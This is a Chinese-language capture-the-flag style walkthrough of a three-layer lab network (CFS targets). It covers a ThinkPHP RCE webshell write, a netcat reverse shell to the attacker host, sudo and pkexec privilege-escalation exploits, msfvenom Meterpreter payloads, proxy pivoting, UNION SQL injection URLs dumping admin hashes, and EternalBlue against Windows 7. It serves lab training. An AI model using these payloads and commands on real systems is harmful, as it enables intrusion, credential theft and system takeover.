前言
在渗透中遇到内网主机是一层接一层的拓扑形式,可以采用多层代理加路由转发访问,便于在渗透中出现网段隔绝可以使用此方法跳出局限
实验环境
kali: 192.168.75.131
target-centos7: 网卡1 192.168.75.132 网卡2 192.168.22.128
target-ubuntu: 网卡1 192.168.22.129 网卡2 192.168.33.128
target-win7: 网卡1 192.168.33.33
三台靶机链接地址:https://pan.baidu.com/s/1ot1S1ou_-dofsZQ9c0dtYg?pwd=38gx
下载到本机后,打开cmd 将所有文件合成为一个,命令如下
copy /b CFS三层靶机环境.7z* CFS.7z
拿到压缩包,解压密码为teamssix.com
linux靶机账号密码均为 root teamssix.com
windows靶机密码为teamssix.com
环境搭建
先配置VMware网卡 三个网卡添加方式都一样,都是仅主机模式
导入三台靶机
第一台靶机查看到有ip出现,物理机直接访问 http://192.168.75.132:8888/a768f109
账号 eaj3yhsl 密码 41bb8fee
设置成功,物理机访问http://192.168.75.132 显示如下说明搭建成功
第二台靶机 查看到ip 物理机访问http://192.168.22.129:8888/2cc52ec0
账号 xdynr37d 密码 123qwe..
设置成功,物理机访问 http://192.168.22.129 显示如下说明搭建成功
第三台靶机 导入,修改网卡并登陆 登陆密码 teamssix.com
除此之外,kali主机也要设置网卡网段与第一台靶机的网卡1同网段
进入interfaces修改网络配置
vi /etc/network/interfaces
温馨提示:这里搭建完三台靶机,建议进行快照,否则三台靶机同时运行容易崩溃,挂起之后就会崩溃,ip会无法识别
渗透部分
首先使用nmap扫描ip
nmap 192.168.75.132 -O -sV
得到一个thinkphp v5的首页,二话不说直接开启dirsearch扫描
python dirsearch.py -u http://192.168.75.132/ -e* //python是用python3,这里我自己改过
仅仅只有三个目录,index.php就是当前访问的页面,我们查看robots.txt
一般robots.txt都会隐藏一些不可爬取的目录
但这里发现除了一个flag没有其他的信息,那就只能继续从index.php入手了,而且favicon.ico只是一个图像,没有可用信息
这里我们尝试xray工具去扫描存在什么漏洞,在浏览器配置代理ip为127.0.0.1,端口为8888(端口随意,但要跟xray监听端口一致),配置完浏览器,开启xray监听,再刷新页面就可以扫描了
发现是一个thinkphp v5的远程命令执行漏洞,且漏洞就在index.php,这里暂时不访问漏洞链接,里边是一个大佬写的poc
紧接着,我们不知道他的get参数,可以使用kali的wfuzz进行爆破参数
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --sc 404 http://192.168.75.132/?FUZZ=id
//-c 是显示颜色,-w是使用字典,--sc 404是将响应码为404的参数显示出来,FUZZ是爆破参数,参数后面跟着id是因为远程命令执行时可用直接使用id查看用户uid和guid
爆破出一个404响应码的s参数,接下来构造poc
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
显示如下就写入一句话成功,然后使用蚁剑连接
拿到webshell后进入后台终端,使用nc -v尝试是否有可执行的nc,不用不知道,一用吓一跳,真有nc可用,那么我们就直接尝试用nc来端口转发,将后台终端转发到我们的kali上,方便后续提权
kali开启监听,后台终端连接并弹shell
kali: nc -lvnp 6666 后台: nc 192.168.75.131 6666 -e /bin/bash
查看可执行权限 find / -perm -4000 2>/dev/null
使用脚本扫描信息得出,有一个sudoedit -s /的漏洞 sudo 转义了反斜杠,但是sudoedit并没有导致了漏洞的出现 cve-2021-3156
脚本链接:https://github.com/Realradioactive/archive-linux-exploit-suggester-master
直接下载CVE-2021-3156的脚本执行,脚本利用sudoedit -s /的漏洞,写入一个密码为gg的用户gg,权限为root
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.75.131 LPORT=1111 -f elf > shell.elf
use exploit/mutli/handler
set lport 1111
set lhost 192.168.75.131
set payload linux/x64/meterpreter/reverse_tcp
查看到有两个网卡信息,由于我们现在已经在第一台靶机后台,我们没办法让第二台靶机反连我们,只能我们去直连,必需先设置去往下一台靶机的路由
run autoroute -s 192.168.22.0/24
开启msf代理模块,设置代理端口和代理版本为socks4
use auxiliary/server/socks_proxy
set srvport 2222
set version 4a
run
设置/etc/proxychains4.conf
vi /etc/proxychains.conf
192.168.75.131 2222
使用代理加nmap扫描 192.168.22.129 第二台靶机
给kali火狐添加刚刚配置的代理ip和端口,然后访问192.168.22.129
这里查看robots.txt发现有一个提示是 index.php?r=admini* ,可能是网站后台登录管理
网站提示 漏洞点在 /index.php?r=vul&keyword=1 而且是一个SQL注入
尝试闭合,发现有报错,再构造 ' and 1=1%23发现界面没报错了(自行尝试)
这里的字段,我尝试了发现有39个,让我有点震惊,这里我优先选择尝试union查询,poc如下:
查数据库
http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,database()%23
查表
http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23
查字段
http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27bage_admin%27%23
查数据
http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(id,0x5c,username,0x5c,password)%20from%20bage_admin%23
这里得到了一串加密的密码,直接md5解密得到密码是 123qwe,直接登录后台
进入后台模板发现可以给index.php文件写入,直接在index.php构造一个一句话木马,而后使用蚁剑连接,如果是真实渗透,需要配置代理连接
连接成功后,直接msf生成后门木马,开启监听连接,注意:这里msfconsole也要开代理进入
msf生成病毒
msfvenom -p linux/x64/meterpreter/bind_tcp rhost=192.168.22.129 LPORT=4444 -f elf > test.elf
msf开启监听
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.22.129
run
进入shell 优化窗口 python -c "import pty;pty.spawn('/bin/bash')"
这里节省时间,直接下载第二台靶机的漏洞利用脚本 CVE-2021-4034
这个漏洞原理是:
Polkit(PolicyKit)是一个用于控制类Unix系统中控制系统范围权限的组件,它为非特权进程与特权进程的通信提供了一种有组织的方式。pkexec是Polkit开源应用框架的一部分,它负责协商特权进程和非特权进程之间的互动,允许授权用户以另一个用户的身份执行命令,是sudo的替代方案。
该漏洞是由于pkexec在处理传入参数的逻辑出现问题,导致环境变量被污染,最终交由pkexec代码逻辑执行实现客户机权限提升。有普通权限用户的攻击者通过执行漏洞文件,触发越界读写,从而在目标系统上造成权限提升
详细讲解可参考这个师傅 https://www.cnblogs.com/vpandaxjl/p/15858288.html
提权成功,返回meterpreter界面,添加192.168.33.0网段的路由
再次配置代理,端口不能一样
use auxiliary/server/socks_proxy
set srvport 3333
set version 4a
run
proxychains4 nmap -Pn -sT 192.168.33.33
有445端口,猜测是有文件共享服务的,可能是一个windows操作系统
使用msf扫描模块 检测一下
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.33.33
set threads 10
run
查看到是window7系统,直接使用永恒之蓝渗透
search ms17-010
use 1
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.33.33
run
